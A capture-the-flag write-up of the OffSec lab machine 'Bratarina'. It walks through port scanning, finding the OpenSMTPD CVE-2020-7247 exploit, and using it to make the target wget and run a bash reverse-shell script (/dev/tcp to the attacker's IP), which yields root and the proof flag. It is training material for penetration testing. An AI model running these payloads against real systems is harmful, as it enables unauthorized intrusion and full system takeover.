Bratarina
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.225.71
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-05 08:38 +03
Nmap scan report for 192.168.225.71
Host is up, received echo-reply ttl 61 (0.17s latency).
Scanned at 2025-10-05 08:38:56 +03 for 231s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQ
klpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YF
XstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.235], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernelWe have ssh running on port 22, smtp on port 25, http on port 80, and finally samba on port 445.
We will start with those ports one by one.
For 22 we can not do anything unless we have a set of credentials, or it is an old version, or we can perform brute forcing on some known users like root, etc.
For port 445 and port 80, I did not find anything useful actually.
Exploitation:
SMTP (25):
We will search for any public exploits for OpenSMTPD:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ searchsploit OpenSMTPD
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No ResultsWe can try any of them blindly:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ searchsploit -m linux/remote/47984.py
Exploit: OpenSMTPD 6.6.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47984
Path: /usr/share/exploitdb/exploits/linux/remote/47984.py
Codes: CVE-2020-7247
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Bratarina/47984.pyThe exploit above, exploit command execution vulnerability in smtp in the mail field of the mail.
When we run it without any arguments:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py
Usage 47984.py <target ip> <target port> <command>
E.g. 47984.py 127.0.0.1 25 'touch /tmp/x'We will first check if this is a valid exploit by first trying to ping our own host using ping and tcpdump:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytesWe will send a ping requests:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py 192.168.225.71 25 'ping 192.168.45.235 -c 4'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:04:40.795116 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 1, length 64
09:04:40.795498 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 1, length 64
09:04:41.751491 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 2, length 64
09:04:41.751526 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 2, length 64
09:04:42.868668 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 3, length 64
09:04:42.868706 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 3, length 64
09:04:43.831654 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 4, length 64
09:04:43.831691 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 4, length 64Indeed this the way in.
I will write a simple sh script to give me a reverse shell on port 445 because this was one of the open ports, and host it using a python web server:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.235/445 0>&1If you passed it like this as argument to the exploit or even surrounded it with bash -c it will error out because of the special characters.
Host it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...Download it to the /tmp folder, then start it with bash (Or we can give it execution permissions and start it itself), but before that we should start our nc listener as well:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ nc -nlvp 445
listening on [any] 445 ...Run the exploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py 192.168.225.71 25 'wget 192.168.45.235/shell.sh -O /tmp/shell.sh; bash /tmp/shell.sh'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] DoneCheck our web server and the netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.225.71 - - [05/Oct/2025 09:22:09] "GET /shell.sh HTTP/1.1" 200 -┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ nc -nlvp 445
listening on [any] 445 ...
connect to [192.168.45.235] from (UNKNOWN) [192.168.225.71] 34198
bash: cannot set terminal process group (1980): Inappropriate ioctl for device
bash: no job control in this shell
root@bratarina:~# id
uid=0(root) gid=0(root) groups=0(root)We rooted the box.
Get the flag:
root@bratarina:~# cat proof.txt
6bfb0ecf56cdce4d4b1dc5c3e0f7636aLast updated